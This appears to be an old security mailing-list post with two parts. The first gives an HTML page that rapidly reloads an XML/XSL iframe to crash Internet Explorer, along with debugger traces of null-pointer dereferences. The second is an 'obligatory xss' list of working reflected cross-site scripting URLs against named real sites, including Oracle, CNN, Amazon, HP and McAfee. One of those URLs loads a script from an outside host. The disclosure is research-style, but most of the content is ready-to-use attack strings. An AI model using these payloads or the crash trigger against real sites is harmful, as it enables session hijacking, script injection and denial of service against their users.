Hi,<br><br>I have found ie crashing when refreshing an iframe containing an xml file with xsl stylesheet (takes a while to crash).<br><br>I used this html:<br>------------------------------<div style="direction: ltr;">---<br>
<html><br><head><br><script language="javaScript"><br>function refresh() {<br> frames[0].window.location.reload();<br> setTimeout("refresh();", 20);<br>}<br></script><br></head>
<br><body><iframe src="input.xml"></iframe><br><script><br>refresh();<br></script><br></body><br></html><br><br>----------------------------------<br> input.xml is calling an xsl stylesheet (cfr. attachment)
<br><?xml version="1.0"?><br><?xml-stylesheet type="text/xsl" href="style2.xsl"?><br><br>----------------------------------<br>w2k:<br>msxml3.dll:69B76B61 mov eax, [esi]<br>msxml3.dll
:69B76B63 mov ecx, esi<br>msxml3.dll:69B76B65 call dword ptr [eax+48h]<br>with esi=0<br><br>MSHTML.DLL:637840E8 test byte ptr [eax+44Dh], 20h<br>with eax=0<br><br>xp:<br>msxml3.dll:74992156 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
<br>EBX=0<br><br>seem like nullpointer derefs.<br>Weird thing it crashes on different addies, somebody can shed some light on why is this?<br></div><br>obligatory xss:<br><br><a href="http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1&nodeid=&fid=&showSimilarDoc=true&group=All" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1&nodeid=&fid=&showSimilarDoc=true&group=All</a> secure search, lol?<br><a href="http://oreilly.com/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
oreilly.com</a>: search powered by <a href="http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-a=sp1000a5a9&sp-f=ISO-8859-1&sp-t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-a=sp1000a5a9&sp-f=ISO-8859-1&sp-t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=
</a><br><a href="http://www.altavista.com/web/results?itag=ody&q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&kgs=1&kls=0" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.altavista.com/web/results?itag=ody&q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&kgs=1&kls=0
</a><br><a href="http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ey00&source=cnn&url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert(1)%3C/script%3Ey00&source=cnn&url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn
</a><br><a href="http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1&o=333&l=dir" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1&o=333&l=dir
</a><br><a href="http://search.amd.com/query.html?col=idx1&qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&charset=iso-8859-1&qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&qs=%7C+language%3Aen&la=en&lap=en&qm=1&tqmhak=0" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://search.amd.com/query.html?col=idx1&qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&charset=iso-8859-1&qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&qs=%7C+language%3Aen&la=en&lap=en&qm=1&tqmhak=0
</a><br><a href="http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&url=search-alias%3Daps&field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&Go.x=11&Go.y=10" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&url=search-alias%3Daps&field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&Go.x=11&Go.y=10</a><br><a href="http://search.hp.com/query.html?charset=iso-8859-1&la=en&hpvc=sitewide&qs=&nh=10&lk=1&rf=0&uf=1&st=1&qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&submitsearch.x=0&submitsearch.y=0" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://search.hp.com/query.html?charset=iso-8859-1&la=en&hpvc=sitewide&qs=&nh=10&lk=1&rf=0&uf=1&st=1&qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&submitsearch.x=0&submitsearch.y=0
</a><br><a href="http://us.mcafee.com/virusInfo/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://us.mcafee.com/virusInfo/</a> : enter following in virus search: (use POST form for exploit)<br>
"><script>alert(1)</script><br><br><br>cheers,<br>Thomas<br>